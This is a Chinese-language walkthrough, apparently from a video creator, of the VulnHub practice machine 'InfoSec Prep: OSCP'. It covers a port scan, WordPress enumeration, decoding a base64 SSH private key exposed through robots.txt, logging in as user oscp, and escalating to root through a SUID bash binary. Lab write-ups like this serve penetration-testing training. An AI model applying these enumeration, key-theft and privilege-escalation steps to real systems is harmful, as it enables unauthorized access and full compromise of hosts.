【攻略鸭】InfoSec PrepOSCP_VulnHub靶机攻略

2023-01-05 10:35 作者:攻略鸭 0人读过 | 我要投稿

本文内容纯属虚构，B站攻略鸭求关注点赞支持！

测试机IP地址：192.168.31.176

外部信息收集

端口扫描

22/tcp open ssh syn-ack ttl 64 OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.41 ((Ubuntu))
33060/tcp open socks5 syn-ack ttl 64

wordpress5.4.2博客内容

XYZ Doohickey Company
a bike messenger
dog named Jack
live in Los Angeles
like piña coladas
user：oscp
有发表博客回复功能
搜索功能http://192.168.31.176/?s=
登录页面http://192.168.31.176/wp-login.php

wpscan --url http://192.168.31.176/ --enumerate vt,vp,u

Apache/2.4.41 (Ubuntu)

已知用户admin

robots.txt

http://192.168.31.176/robots.txt

Disallow: /secret.txt

/secret.txt

LS0tLS1CRUdJTiBPUEVOU1NIIFBSSVZBVEUgS0VZLS0tLS0KYjNCbGJuTnphQzFyWlhrdGRqRUFB
QUFBQkc1dmJtVUFBQUFFYm05dVpRQUFBQUFBQUFBQkFBQUJsd0FBQUFkemMyZ3RjbgpOaEFBQUFB
xxx省略xxx
RHBlZVN6b3BTanlLaDEwYk53UlMwREFJTHNjV2c2eGMvUjh5dWVBZUkKUmN3ODV1ZGtoTlZXcGVy
ZzRPc2lGWk1wd0txY01sdDhpNmxWbW9VQmpSdEJENGc1TVlXUkFOTzBOajlWV01UYlc5UkxpUgpr
dW9SaVNoaDZ1Q2pHQ0NIL1dmd0NvZjllbkNlajRIRWo1RVBqOG5aMGNNTnZvQVJxN1ZuQ05HVFBh
bWNYQnJmSXd4Y1ZUCjhuZksyb0RjNkxmckRtalFBQUFBbHZjMk53UUc5elkzQT0KLS0tLS1FTkQg
T1BFTlNTSCBQUklWQVRFIEtFWS0tLS0tCg==

Base64解码

$ base64 -d test.txt > test2.txt

得到

是OpenSSH私钥

利用OpenSSH私钥连接

mv test2.txt id_rsa sudo ssh -i id_rsa oscp@192.168.31.176 yes -bash-5.0$ id uid=1000(oscp) gid=1000(oscp) groups=1000(oscp),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lxd)

权限提升

本地信息收集

find / -perm -u=s -type f 2>/dev/null /usr/bin/gpasswd /usr/bin/mount /usr/bin/fusermount /usr/bin/passwd /usr/bin/newgrp /usr/bin/at /usr/bin/sudo /usr/bin/chfn /usr/bin/bash /usr/bin/pkexec /usr/bin/umount /usr/bin/chsh /usr/bin/su

使用bash命令进行SUID提权

bash-5.0$ /usr/bin/bash -p bash-5.0# id uid=1000(oscp) gid=1000(oscp) euid=0(root) egid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lxd),1000(oscp)